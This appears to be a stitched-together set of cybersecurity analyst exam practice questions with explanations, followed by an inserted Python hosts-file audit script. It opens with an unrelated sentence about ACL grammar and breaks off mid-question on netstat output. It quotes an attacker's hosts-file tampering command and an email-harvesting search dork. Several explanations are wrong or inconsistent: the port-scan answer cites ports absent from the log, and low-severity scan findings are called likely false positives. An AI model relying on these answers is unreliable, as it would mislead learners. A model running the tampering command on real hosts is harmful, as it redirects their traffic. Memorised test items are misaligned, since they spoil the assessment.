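Real ACL syntax allows wildcard masks, port ranges and an implicit deny at the end of the list; the grammar here is deliberately limited to the forms that appear in the question so the reasoning about each option stays visible.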
You have just run the following commands on your Linux workstation: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- DionTraining:~ root# ls Names.txt DionTraining:~ root# more Names.txt DION DIOn Dion dion DionTraining:~ root# grep -i DION Names.txt -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Which of the following options would be included as part of the output for the grep command issued? (SELECT ALL THAT APPLY) DION Dion DIOn Dion dion
DION, DIOn, Dion, dion The grep (global regular expression print) command is one of Linux's most powerful search tools. The general syntax for the grep command is "grep [options] pattern [files]". The command searches within the specified files (in this case, the Names.txt file). When the command is issued with the -i optional flag, it treats the specified pattern as case insensitive. Therefore, every uppercase and lowercase variation of the word "DION" in the file (DION, DIOn, Dion, and dion) is displayed as the command output. By default, grep is case sensitive, so "grep DION Names.txt" would display only "DION" and ignore the other variations. As a cybersecurity analyst, grep is one of your most important tools. You can use regular expressions (regex) to quickly find indicators of compromise within your log files using grep.
Your organization is concerned about potential leaks of sensitive data. Which technology should be deployed to identify and prevent unauthorized access to such data? Encryption Firewalls DLP Anti-Virus
DLP Data Loss Prevention (DLP) solutions play a crucial role in protecting an organization's sensitive information from unauthorized exposure. By identifying critical data, monitoring how it moves and is used across the network, and preventing unsanctioned access or transmission, DLP tools offer comprehensive protection against data breaches. These technologies can mitigate risks from both internal and external threats, safeguarding data whether it's at rest, in use, or in transit. Anti-virus software primarily focuses on identifying and removing malware and doesn't offer specific protections for sensitive data like DLP. While firewalls can prevent unauthorized network access, they do not specifically identify or protect sensitive data like DLP does. Encryption can secure data in transit or at rest but doesn't actively identify or prevent unauthorized access to sensitive data like DLP.
Richard attempted to visit a website and received a DNS response from the DNS cache server pointing to the wrong IP address. Which of the following attacks has occurred? ARP spoofing DNS poisoning MAC spoofing DNS brute forcing
DNS poisoning DNS poisoning (also known as DNS cache poisoning or DNS spoofing) is a type of attack that uses security gaps in the Domain Name System (DNS) protocol to redirect internet traffic to malicious websites. MAC spoofing is a technique for changing the factory-assigned Media Access Control (MAC) address of a network interface on a networked device. ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network using layer 2 address information. DNS brute-forcing is used to check for wildcard entries using a dictionary or wordlist. This technique is used when a DNS zone transfer is not allowed by a system.
Which of the following types of capabilities would an adversary need to identify and exploit zero-day vulnerabilities? Integrated Acquired and augmented Developed Advanced
Developed According to the MITRE ATT&CK framework, developed capabilities can identify and exploit zero-day vulnerabilities. Acquired and augmented refers to the utilization of commodity malware and techniques (i.e., script kiddies). Advanced capabilities refer to those that can introduce vulnerabilities through the supply chain in proprietary and open-source products. Integrated capabilities involve non-cyber tools such as political or military assets.
You are a security investigator at a high-security installation which houses significant amounts of valuable intellectual property. You are investigating the utilization of George's credentials and are trying to determine if his credentials were compromised or if he is an insider threat. In the break room, you overhear George telling a coworker that he believes he is the target of an ongoing investigation. Which of the following steps in the preparation phase of the incident response was likely missed? Creating a call list or escalation list Conduct background screenings on all applicants Developing a proper incident response form Development of a communication plan
Development of a communication plan An established and agreed-upon communication plan, which may also include a non-disclosure agreement, should be put in place to prevent the targets of an ongoing insider threat investigation from becoming aware of it. Even if it was later determined that George was innocent, the knowledge that he was being investigated could be damaging to both him and the company. If he was an insider threat who now suspects he is under investigation, he could take steps to cover his tracks or conduct destructive action. While background screenings may prevent some people from becoming insiders, they would not prevent the unauthorized disclosure of information concerning the investigation. A call list/escalation list will help manage this kind of problem and keep the right people informed, but it will not explicitly deal with the issue of inadvertent disclosure. Similarly, a proper incident response form may include guidance for communication, but it would have been orchestrated as part of a larger communications plan that detailed the proper channels to use.
Your incident response team has identified a persistent threat actor who has used a spear-phishing attack to compromise a system in your network. The actor used this system to move laterally within the network, stealing sensitive data. The team wants to understand the relationship between the adversary, the victim system, the phishing infrastructure used by the attacker, and the lateral movement capability. Which framework would best help them in this analysis? MITRE ATT&CK Diamond Model of Intrusion Analysis OWASP Testing Guide Cyber Kill Chain
Diamond Model of Intrusion Analysis The Diamond Model of Intrusion Analysis provides a framework for understanding the four key elements of a cyber attack: the adversary (threat actor), the victim (compromised system), the infrastructure (phishing setup), and the capability (lateral movement). The MITRE ATT&CK framework details tactics, techniques, and procedures used by attackers, but it does not specifically address the relationship between adversary, victim, infrastructure, and capability. The OWASP Testing Guide provides a methodology for testing web application security, not for analyzing a cyber attack's relationships. The Cyber Kill Chain describes the stages of a cyber attack, but it does not specifically analyze the relationships between the adversary, victim, infrastructure, and capability.
Sarah has reason to believe that systems on her network have been compromised by an APT. She has noticed many file transfers outbound to a remote site via TLS-protected HTTPS sessions from unknown systems. Which of the following techniques would most likely detect the APT? Endpoint behavior analysis Network traffic analysis Endpoint forensics Network forensics
Endpoint forensics An advanced persistent threat (APT) is a stealthy computer network threat actor, typically a nation-state or state-sponsored group, which gains unauthorized access to a computer network and remains undetected for an extended period. APTs usually send encrypted traffic so that they are harder to detect through network traffic analysis or network forensics. This means that you need to focus on the endpoints to detect an APT. Unfortunately, APTs are very sophisticated, so endpoint behavioral analysis is unlikely to detect them easily. Sarah will therefore need to conduct endpoint forensics as her most likely method to detect an APT and its associated infections on her systems.
Your organization has detected unusual network traffic patterns originating from an internal server during non-business hours. Upon investigation, it's discovered that an attacker has gained access and is sending data outbound on an uncommon port. According to the MITRE ATT&CK framework, which stage does this activity align with? Discovery Exfiltration Command and Control Lateral Movement
Exfiltration In the MITRE ATT&CK framework, Exfiltration is the stage that describes the transmission of information from within the victim's environment to a location controlled by the adversary. Command and Control pertains to how an adversary communicates with systems under their control within a target network, not the stage of exporting data out of the network. Discovery involves the adversary understanding the network and looking for resources to further their attack, not the act of sending data out of the network. Lateral Movement refers to the techniques an adversary uses to traverse the network, not the act of exfiltrating data.
In the Cyber Kill Chain model, at which stage does an attacker deliver the actual working part of the attack? Weaponization Command and Control Exploitation Reconnaissance
Exploitation The Exploitation phase is where the attacker leverages a vulnerability to execute the main part of the attack. Reconnaissance is the initial phase where the attacker gathers information about the target. Weaponization is where the attacker creates a malicious payload but does not deliver it. The Command and Control phase is where the attacker establishes a channel to remotely control the compromised system.
What regulation protects the privacy of student educational records? GLBA HIPAA SOX FERPA
FERPA The Gramm-Leach-Bliley Act (GLBA) institutes requirements that help protect the privacy of an individual's financial information held by financial institutions and others, such as tax preparation companies. The privacy standards and rules created as part of GLBA safeguard private information and set penalties in the event of a violation. The Sarbanes-Oxley Act (SOX) dictates requirements for storing and retaining documents relating to an organization's financial and business operations, including the type of documents to be stored and their retention periods. It is relevant for any publicly-traded company with a market value of at least $75 million. The Family Educational Rights and Privacy Act (FERPA) requires that educational institutions implement security and privacy controls for student educational records. The Health Insurance Portability and Accountability Act (HIPAA) establishes several rules and regulations regarding healthcare in the United States. With the rise of electronic medical records, HIPAA standards have been implemented to protect patient medical information privacy through restricted access to medical records and regulations for sharing medical records.
Which law requires government agencies and other organizations that operate systems on behalf of government agencies to comply with security standards? HIPAA COPPA FISMA SOX
FISMA The Federal Information Security Management Act (FISMA) is a United States federal law that defines a comprehensive framework to protect government information, operations, and assets against natural or human-made threats. FISMA requires that government agencies and other organizations that operate systems on behalf of government agencies comply with security standards. The Health Insurance Portability and Accountability Act (HIPAA) is a United States federal law designed to provide privacy standards to protect patients' medical records and other health information provided to health plans, doctors, hospitals, and other health care providers. The Children's Online Privacy Protection Act (COPPA) is a United States federal law that imposes certain requirements on operators of websites or online services directed to children under 13 years of age and on operators of other websites or online services that have actual knowledge that they are collecting personal information online from a child under 13 years of age. Sarbanes-Oxley (SOX) is a United States federal law that set new or expanded requirements for all U.S. public company boards, management, and public accounting firms.
Your intrusion detection system has produced an alert based on its review of a series of network packets. After analysis, it is determined that the network packets did not contain any malicious activity. How should you classify this alert? True positive False positive True negative False negative
False positive A false positive occurs when an alert is triggered (the system believes malicious activity occurred) when there is no malicious activity involved. A false positive is an error in some evaluation process in which a condition tested for is mistakenly found to have been detected.
Dion Consulting Group has recently received a contract to develop a networked control system for a self-driving car. The company's CIO is concerned about the liability of a security vulnerability being exploited that may result in the death of a passenger or an innocent bystander. Which of the following methodologies would provide the single greatest mitigation if successfully implemented? Formal methods of verification Peer review of source code DevSecOps Rigorous user acceptance testing
Formal methods of verification Formal verification methods use a mathematical model of the inputs and outputs of a system to prove that the system works as specified in all cases. Given the level of certainty achieved through formal verification methods, this approach provides the single greatest mitigation against this threat. Formal methods are designed for use in critical software in which corner cases must be eliminated. For example, what should the car do if a child jumps out in front of it, and the only way to avoid the child is to swerve off the road (which might kill the driver)? This is a classic corner case that needs to be considered for a self-driving car. User acceptance testing (UAT) is a beta phase of software testing. When the developers have tested the software, it is installed for a limited set of users who follow test schemes and report findings. DevSecOps is a combination of software development, security operations, and systems operations and integrates each discipline with the others. Peer review of source code allows for the review of uncompiled source code by other developers. While DevSecOps, peer review, and user acceptance testing help bring down the system's risk, only a formal method of verification could limit the liability involved with such a critical application as a self-driving car.
You have been hired as a cybersecurity analyst for a privately-owned bank. Which of the following regulations would have the greatest impact on your bank's cybersecurity program? HIPAA GLBA SOX FERPA
GLBA The Gramm-Leach-Bliley Act (GLBA) is a United States federal law that requires financial institutions to explain how they share and protect their customers' private information. The Health Insurance Portability and Accountability Act (HIPAA) is a US law designed to provide privacy standards to protect patients' medical records and other health information provided to health plans, doctors, hospitals, and other health care providers. Sarbanes-Oxley (SOX) is a United States federal law that set new or expanded requirements for all US public company boards, management, and public accounting firms. The Family Educational Rights and Privacy Act (FERPA) of 1974 is a United States federal law that governs the access to educational information and records by public entities such as potential employers, publicly funded educational institutions, and foreign governments.
Which of the following is not considered a component that belongs to the category of identity management infrastructure? Auditing system Human resource system LDAP Provisioning engine
Human resource system The human resource system may be a data source for identity management, but it is not part of the infrastructure itself. LDAP servers, provisioning engines, and auditing systems are all part of identity management infrastructures. Most organizations rely on an LDAP Directory to store users, groups, roles, and relationships between those entities. A provisioning engine is responsible for coordinating the creation of user accounts, email authorizations in the form of rules and roles, and other tasks such as provisioning of physical resources associated with enabling new users. The auditing system is responsible for verifying the identities present in the organization's systems are valid and correct.
An analyst reviews the logs from the network and notices that there have been multiple attempts from the open wireless network to access the networked HVAC control system. The open wireless network must remain openly available so that visitors can access the internet. How can this type of attack be prevented from occurring in the future? Enable WPA2 security on the open wireless network Install an IDS to protect the HVAC system Enable NAC on the open wireless network Implement a VLAN to separate the HVAC control system from the open wireless network
Implement a VLAN to separate the HVAC control system from the open wireless network A VLAN is useful to segment network traffic into various parts of the network and stop someone on the open wireless network from logging in to the HVAC controls. By utilizing NAC, each machine connected to the open wireless network could be checked for compliance to determine if it is a 'known' machine, but it would still be given access to the entire network. Also, since this is a publicly usable network, using NAC could prevent visitors from accessing the network at all. An IDS would be a good solution to detect the attempted logins, but it won't prevent them. Instead, an IPS would be required to prevent logins.
Your organization has experienced a significant cybersecurity incident, and an executive summary of the incident has been prepared. However, the board of directors has requested detailed evidence supporting the summary. Where would they typically find this information? In the public relations communication In the evidence section of the incident response report In the executive summary In the regulatory reporting
In the evidence section of the incident response report The evidence section typically contains all detailed information, data, and artifacts related to the incident, supporting the claims and conclusions made in the executive summary. The executive summary is meant to provide a high-level overview of the incident, and while it should be accurate, it typically does not include detailed evidence. Regulatory reporting is focused on providing information to regulatory bodies and usually does not include detailed evidence supporting an executive summary. Public relations communications are intended for external stakeholders and are not typically used for providing detailed evidence related to an incident.
In the Mirai botnet attack, thousands of IoT devices, such as cameras and routers, were infected and used to launch large-scale DDoS attacks. In the Diamond Model of Intrusion Analysis, what do these IoT devices represent? Infrastructure Victim Adversary Capability
Infrastructure In the Diamond Model of Intrusion Analysis, the infected IoT devices used in the Mirai botnet attack represent the Infrastructure. Capability refers to the tools and techniques used in the attack, not the resources used in the attack. The Adversary is the entity conducting the attack, not the resources used in the attack. The Victim is the target of the attack, not the resources used in the attack.
Schuyler, a cybersecurity analyst, is considering purchasing a service which will provide a Virtual Private Cloud to host her company's website. Which of the following service models is Schuyler looking at purchasing for her company? Function as a Service Infrastructure as a Service Software as a Service Platform as a Service
Infrastructure as a Service Infrastructure as a Service (IaaS) is a computing method that uses the cloud to provide any or all infrastructure needs. In a VPC environment, an organization may provision virtual servers in a cloud-hosted network. The service consumer is still responsible for maintaining the IP address space and routing internally to the cloud. Platform as a Service (PaaS) is a computing method that uses the cloud to provide any platform-type services. Software as a Service (SaaS) is a computing method that uses the cloud to provide users with application services. Function as a Service (FaaS) is a cloud service model that supports serverless software architecture by provisioning runtime containers to execute code in a particular programming language.
What does a Cross-Site Scripting (XSS) vulnerability allow an attacker to do? Inject malicious scripts into web pages viewed by other users Modify the content of a website Bypass authentication controls Decrypt encrypted data
Inject malicious scripts into web pages viewed by other users XSS vulnerabilities allow attackers to inject malicious scripts into web pages that other users of the site will view, leading to potential data theft or other malicious actions. XSS does not allow an attacker to modify the actual content of the website, but rather the content as viewed by a specific user, and only for the duration of that user's session. While serious, XSS vulnerabilities do not directly involve bypassing authentication controls. This would be more associated with authentication or session management vulnerabilities. XSS vulnerabilities do not involve decrypting encrypted data. Decryption without the proper key would generally require a cryptographic attack.
Yoyodyne Systems has recently bought out its competitor, Whamiedyne Systems, which went out of business due to a series of data breaches. As a cybersecurity analyst for Yoyodyne, you are assessing Whamiedyne's existing applications and infrastructure. During your analysis, you discover the following URL is used to access an application:

https://www.whamiedyne.com/app/accountInfo?acct=12345

You change the URL to end with 12346 and notice that a different user's account information is now displayed. Which of the following types of vulnerabilities or threats have you discovered? Insecure direct object reference Race condition SQL injection XML injection
Insecure direct object reference This is an example of an insecure direct object reference. Direct object references are typically insecure when they do not verify whether a user is authorized to access a specific object. Therefore, it is important to implement access control techniques in applications that work with private information or other sensitive data types. Based on the URL above, you cannot determine if the application is vulnerable to an XML or SQL injection attack. In a SQL injection attack, an attacker adds code to some input within the web app, causing the application to execute the attacker's own set of SQL queries. An XML injection is similar but focuses on XML code instead of SQL queries. A race condition is a software vulnerability in which the resulting outcome of execution processes is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing the developer intended; that is not the case in this scenario.
What containment technique is the strongest possible response to an incident? Segmentation Isolating affected systems Isolating the attacker Enumeration
Isolating affected systems Isolation involves removing an affected component from whatever larger environment it is a part of. This can be anything from removing a server from the network after it has been the target of a DoS attack to placing an application in a sandbox virtual machine (VM) outside of the host environments it usually runs on. Segmentation-based containment is a means of achieving the isolation of a host or group of hosts using network technologies and architecture. Segmentation uses VLANs, routing/subnets, and firewall ACLs to prevent a host or group of hosts from communicating outside the protected segment. Removal is not a term used in the industry, but it would be a synonym for isolation. Enumeration is defined as the process of extracting user names, machine names, network resources, shares, and services from a system. Isolating the attacker would only stop their direct two-way communication with and control of the affected system. However, it would not be the strongest possible response, since there could be malicious code still running on your victimized machine.
A cybersecurity analyst just finished conducting an initial vulnerability scan and is reviewing their results. To avoid wasting time on results that are not really a vulnerability, the analyst wants to remove any false positives before remediating the findings. Which of the following is an indicator that something in their results would be a false positive? An HTTPS entry that indicates the web page is securely encrypted A scan result showing a version that is different from the automated asset inventory A finding that shows the scanner compliance plug-ins are not up-to-date Items classified by the system as Low or as For Informational Purposes Only
Items classified by the system as Low or as For Informational Purposes Only When conducting a vulnerability scan, it is common for the report to include some findings that are classified as "low" priority or "for informational purposes only." These are most likely false positives and can be ignored by the analyst when starting their remediation efforts. An HTTPS entry that indicates the web page is securely encrypted is not a false positive but a true negative (a non-issue). A scan result showing a different version from the automated asset inventory should be investigated and is likely a true positive. A finding that shows the scanner compliance plug-ins are not up-to-date would likely also be a true positive that should be investigated.
You are the first forensic analyst to arrive on the scene of a data breach. You have been asked to begin evidence collection on the server while waiting for the rest of your team to arrive. Which of the following evidence should you capture first? L3 cache ARP cache Backup tapes Image of the server's SSD
L3 cache When collecting evidence, you should always follow the order of volatility. This will allow you to collect the most volatile evidence (most likely to change) first and the least volatile (least likely to change) last. You should always begin by collecting the CPU registers and cache memory (L1/L2/L3/GPU). Next come the contents of system memory (RAM), including the routing table, ARP cache, process tables, kernel statistics, and temporary file systems/swap space/virtual memory. After that, you would move on to the collection of data storage devices like hard drives, SSDs, and flash memory devices. Finally, you would move on to less volatile data such as backup tapes, external media devices (hard drives, DVDs, etc.), and even configuration data or network diagrams.
Your company is adopting a cloud-first architecture model. Management wants to decommission the on-premises SIEM your analysts use and migrate it to the cloud. Which of the following is an issue with using this approach? A VM escape exploit could allow an attacker to gain access to the SIEM The company will have less control over the SIEM Legal and regulatory issues may prevent data migration to the cloud The company will be dependent on the cloud provider's backup capabilities
Legal and regulatory issues may prevent data migration to the cloud If there are legal or regulatory requirements that require the company to host its security audit data on-premises, then moving to the cloud will not be possible without violating applicable laws. For example, some companies must host their data within their national borders, even if migrating to the cloud. The other options presented are all low risk and can be overcome with proper planning and mitigations. Most cloud providers have degrees of redundancy far above what any individual on-premises provider will be able to generate, making the concern over backups a minimal risk. If the SIEM is moved to a cloud-based server, it could still be operated and controlled in the same manner as the previous on-premises solution using a virtualized cloud-based server. While a VM or hypervisor escape is possible, they are rare and can be mitigated with additional controls.
Which analysis framework makes no allowance for an adversary retreat in its analysis? AlienVault (AT&T Cybersecurity) Cyber Kill Chain Lockheed Martin cyber kill chain MITRE ATT&CK framework Diamond Model of Intrusion Analysis
Lockheed Martin cyber kill chain The Lockheed Martin cyber kill chain implicitly assumes a unidirectional workflow. Therefore, it fails to consider that an adversary may retreat during an attack. MITRE and Diamond's models are more dynamic systems that allow for a broader range of adversary behaviors. AlienVault was specifically designed to avoid the rigidity of the Lockheed Martin cyber kill chain.
Which of the following terms refers to the action taken to minimize the impact of a vulnerability? Penetration Testing Mitigation Authentication Secure Coding
Mitigation Mitigation is a process that encompasses measures employed to lessen the impact or consequences of a given vulnerability. These actions could involve a variety of strategies, such as patching, which addresses the vulnerability directly by rectifying the underlying security flaw. Alternatively, mitigation could involve implementing additional security controls to decrease the likelihood of an attack. In some cases, complete removal of the system or service in question might be the best course of action. This eliminates the risk entirely, as the potential attack surface is no longer present. Consequently, mitigation represents a proactive approach to manage and reduce the potential impact of system vulnerabilities, thereby enhancing overall network security. Authentication is the process of verifying a user's identity, not reducing the impact of a vulnerability. Secure coding is a practice of writing programs in a way that prevents security vulnerabilities. Penetration testing involves simulating cyber attacks to evaluate the security of a system, not the actions taken to reduce vulnerability impact.
Your web application security team is preparing to conduct security testing on a new web application. Which guide would provide the most comprehensive framework for this testing? OWASP Testing Guide MITRE ATT&CK OSS TMM Cyber Kill Chain
OWASP Testing Guide The OWASP Testing Guide provides a comprehensive framework for web application security testing. While the Open Source Security Testing Methodology Manual (OSSTMM) does provide guidance for security testing, it is not specifically focused on web application security testing. The MITRE ATT&CK framework primarily serves as a knowledge base for understanding attacker behaviors and tactics, techniques, and procedures (TTPs), not for guiding web application security testing. The Cyber Kill Chain describes the stages of a cyberattack, not a framework for web application security testing.
What type of malware changes its binary pattern in its code on specific dates or times to avoid detection by antimalware software? Polymorphic virus Logic bomb Trojan Ransomware
Polymorphic virus A polymorphic virus alters its binary code to avoid detection by antimalware scanners that rely on signature-based detection. By changing its signature, the virus can avoid detection.
Consider the following snippet from a log file collected on the host with the IP address of 10.10.3.6.

Time: Jun 12, 2020 09:24:12 Port:20 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:18 Port:23 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:20 Port:25 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:22 Port:80 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:24 Port:135 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:26 Port:443 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:26 Port:445 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP

What type of activity occurred based on the output above? Denial of service attack targeting 10.10.3.6 Port scan targeting 10.10.3.2 Fragmentation attack targeting 10.10.3.6 Port scan targeting 10.10.3.6
Port scan targeting 10.10.3.6 Port scanning is the name for the technique used to identify open ports and services available on a network host. Based on the logs, you can see a sequential scan of some commonly used ports (20, 21, 22, 23, 25, 80, 135, 443, 445) with a two-second pause between each attempt. The scan source is 10.10.3.2, and the destination of the scan is 10.10.3.6, making "Port scan targeting 10.10.3.6" the correct choice. IP fragmentation attacks are a common form of denial of service attack, in which the perpetrator overwhelms a network by exploiting datagram fragmentation mechanisms. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor's actions.
A threat intelligence analyst is researching a new indicator of compromise. At the same time, the web proxy server generated an alert for this same indicator of compromise. When asked about this alert, the analyst insists that they did not visit any of the related sites, but instead, the sites were listed on the results page of their search engine query. Which of the following is the BEST explanation for what has occurred? Prefetch is enabled on the analyst's web browser The standard approved browser was not being used by the analyst Alert is unrelated to the search that was conducted A link related to the indicator was accidentally clicked by the analyst
Prefetch is enabled on the analyst's web browser Prefetch, a capability in modern web browsers, is used to speed up web browsing by grabbing content that may be asked for by the user at a later time. For example, if you search for a term and the results are being shown to the user, prefetch will download the first three results in anticipation of the user clicking one of the top three links. In the scenario presented in this question, the prefetch has downloaded the malicious content and therefore caused the alert.
A penetration tester is using a known vulnerability to compromise an Apache webserver. After they gain access to the server, what is their next step to pivot to a protected system behind the DMZ? Privilege escalation Patching Vulnerability scanning Installing additional tools
Privilege escalation Apache web servers are run as a limited user by default, not as an administrative or root account. To be efficient and effective, the penetration tester should attempt to conduct a privilege escalation before pivoting into the DMZ. As a penetration tester, they would not likely patch the system, conduct a vulnerability scan, or install additional tools. This does not help them achieve their goal of pivoting into the DMZ.
Which tool should a malware analyst utilize to track the registry's changes and the file system while running a suspicious executable on a Windows system? DiskMon Autoruns Process Monitor ProcDump
Process Monitor Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry, and process/thread activity. Autoruns shows you what programs are configured to run during system bootup or login. ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. DiskMon is an application that logs and displays all hard disk activity on a Windows system. This question may seem beyond the scope of the exam. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goal isn't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!
What is the main purpose of the Open Source Security Testing Methodology Manual (OSSTMM)? Providing a structured approach to security testing Understanding the relationships between the elements of a cyber attack Providing a knowledge base of tactics, techniques, and procedures used by attackers Describing the linear progression of a cyber attack
Providing a structured approach to security testing The Open Source Security Testing Methodology Manual (OSSTMM) provides a structured approach to security testing across different areas such as applications, networks, and systems. This is a primary focus of the Diamond Model of Intrusion Analysis, not the OSSTMM. This is a primary purpose of the MITRE ATT&CK framework, not the OSSTMM. This is the main focus of the Cyber Kill Chain, not the OSSTMM.
A cybersecurity analyst reviews the logs of a proxy server and sees the following URL, https://www.google.com/search?q=*%40diontraining.com. Which of the following is true about the results of this search? Returns all web pages containing an email address affiliated with diontraining.com Returns no useful results for an attacker Returns all web pages hosted at diontraining.com Returns all web pages containing the text diontraining.com
Returns all web pages containing an email address affiliated with diontraining.com Google interprets this statement as <anything>@diontraining.com and understands that the user is searching for email addresses, since %40 is the URL-encoded (hexadecimal) form of the @ symbol. The * is a wildcard character, meaning that any text could be substituted for the * in the query. This type of search would provide an attacker with a list of email addresses associated with diontraining.com, which could be used as part of a spear-phishing campaign. To return all web pages hosted at diontraining.com, you should use the "site:" modifier in the query. To return all web pages with the text diontraining.com, enter "diontraining.com" into the Google search bar with no modifiers.
In the aftermath of a ransomware attack at your company, you as the incident response manager have been asked to present a report to the executive team. They are particularly interested in a detailed analysis of how the attack happened and the key areas that allowed for it to occur. What part of your report should you focus on? Executive summary Scope Recommendations Root cause analysis
Root cause analysis A root cause analysis provides a deep dive into what allowed the incident to occur, helping to identify vulnerabilities and procedural shortcomings. The scope section typically outlines what systems and data were impacted by the incident, not the reasons behind it. While the recommendations section provides guidance on future action, it does not typically contain a detailed analysis of how the incident occurred. While the executive summary provides a high-level overview of the incident, it does not typically delve into a detailed analysis of the root causes.
After a cyber incident at your organization where a ransomware attack crippled the operational servers, your team is tasked with conducting an in-depth examination. The goal is to trace back the origin of the attack, determining where and how it penetrated your defenses. Which activity would best aid your team in this endeavor? Incident response plan Lessons learned Root cause analysis Forensic analysis
Root cause analysis Root cause analysis involves investigating an incident in detail to determine its origin and how it unfolded, with the aim of preventing similar incidents in the future. The incident response plan is a preparatory document outlining the organization's approach to managing security incidents. It is not an activity performed after an incident. Lessons learned is the review process after an incident, where stakeholders evaluate what happened, what was done well, and what needs improvement. It's a broader concept than just determining the initial cause of an issue. Although forensic analysis also involves a thorough investigation of an incident, its focus is broader and often includes legal implications, whereas root cause analysis is more focused on the initial causes of the issue.
You are analyzing a Linux server that you suspect has been tampered with by an attacker. You went to the terminal and typed 'history' into the prompt and saw the output: echo 127.0.0.1 diontraining.com >> /etc/hosts Which of the following best describes what actions were performed by this line of code? Attempted to overwrite the host file and deleted all data except this entry Added the website to system's whitelist in the hosts file Routed traffic destined for the localhost to the diontraining.com domain Routed traffic destined for the diontraining.com domain to the localhost
Routed traffic destined for the diontraining.com domain to the localhost Based on the output provided, it appears that the attacker has attempted to route all traffic destined for diontraining.com to the IP address specified (127.0.0.1). This is typically done to prevent a system from communicating with a specific domain or to redirect a host to a malicious site. In this example, the IP address and domain name pair of 127.0.0.1 and diontraining.com is being appended to the /etc/hosts file. Modifying your hosts file enables you to override the domain name system (DNS) for a domain on a specific machine. The >> operator redirects the output of the command on its left (echo) to the end of the file named on its right. If > were used instead of >>, this command would have overwritten the hosts file completely with this entry. The hosts file is not a system whitelist file.
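An analyst who finds this command in the shell history will usually want to audit the whole hosts file for the same pattern, not just the one line. The following is an added example (not from the practice exam): it parses a constructed hosts file that contains the appended diontraining.com entry and reports every hostname that resolves to a loopback or 0.0.0.0 address without being one of the names normally expected there. The sample content, the expected-name list and the local_hostnames parameter are assumptions for this example.

```python
import ipaddress

# Constructed sample hosts file. The diontraining.com line is the kind of entry
# that `echo 127.0.0.1 diontraining.com >> /etc/hosts` appends.
SAMPLE_HOSTS = """\
127.0.0.1   localhost
127.0.1.1   workstation.example.internal workstation
::1         localhost ip6-localhost ip6-loopback
10.0.0.5    fileserver.example.internal   # legitimate internal override
127.0.0.1 diontraining.com
0.0.0.0     ads.example-tracker.net
"""

# Names that normally map to loopback on a Linux host (assumed baseline).
EXPECTED_LOOPBACK_NAMES = {
    "localhost", "localhost.localdomain", "localhost6",
    "ip6-localhost", "ip6-loopback",
}


def parse_hosts(text):
    """Return [(ip_address, [hostnames]), ...] for each non-comment hosts line."""
    records = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop trailing comments and blanks
        if not line:
            continue
        parts = line.split()
        try:
            addr = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # malformed address; a fuller audit would report it
        records.append((addr, parts[1:]))
    return records


def find_sinkholed_names(text, local_hostnames=()):
    """Return (ip, hostname) pairs that point a name at loopback or 0.0.0.0 when
    the name is neither a standard loopback alias nor this machine's own hostname.
    Such entries silently override DNS for that domain on this host."""
    allowed = EXPECTED_LOOPBACK_NAMES | set(local_hostnames)
    suspicious = []
    for addr, names in parse_hosts(text):
        if not (addr.is_loopback or addr.is_unspecified):
            continue  # overrides to other addresses deserve review too, but are a different case
        for name in names:
            if name not in allowed:
                suspicious.append((str(addr), name))
    return suspicious


if __name__ == "__main__":
    for ip, name in find_sinkholed_names(
        SAMPLE_HOSTS, local_hostnames=("workstation.example.internal", "workstation")
    ):
        print(f"review: {name} is pinned to {ip}")
```

On a real host you would read /etc/hosts (or the Windows equivalent under drivers\etc) and pass the machine's own hostnames via local_hostnames, otherwise the common 127.0.1.1 self-entry is reported as well; the 0.0.0.0 ad-blocking entry shows that every hit is a lead to confirm, not proof of tampering by itself.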
The management at Steven's work is concerned about rogue devices being attached to the network. Which of the following solutions would quickly provide the most accurate information that Steve could use to identify rogue devices on a wired network? Router and switch-based MAC address reporting A discovery scan using a port scanner A physical survey Reviewing a central administration tool like a SCCM
Router and switch-based MAC address reporting The best option is MAC address reporting from a source device like a router or a switch. If the company uses a management system or inventory process to capture these addresses, then a report from one of these devices will show what is connected to the network even when they are not currently in the inventory. This information could then be used to track down rogue devices based on the physical port connected to a network device.
DeepScan supports data-flow analysis and understands the execution flow of a program. It allows you to see possible security flaws without executing the code. Which of the following types of tools would DeepScan be classified as? Fault injector Static code analyzer Decompiler Fuzzer
Static code analyzer DeepScan is an example of a static code analysis tool. It inspects the code for possible errors and issues without actually running the code. Fuzzing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program through a fuzzer. A decompiler is a computer program that takes an executable file as input and attempts to create a high-level source file that can be recompiled successfully. Fault injection is a testing technique that aids in understanding how a system behaves when stressed in unusual ways. A fuzzer, decompiler, and fault injector are all dynamic analysis tools because they require the program being tested to be run during analysis.
A cybersecurity analyst is analyzing an employee's workstation that is acting abnormally. The analyst runs the netstat command and reviews the following output:
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING
TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT
TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED
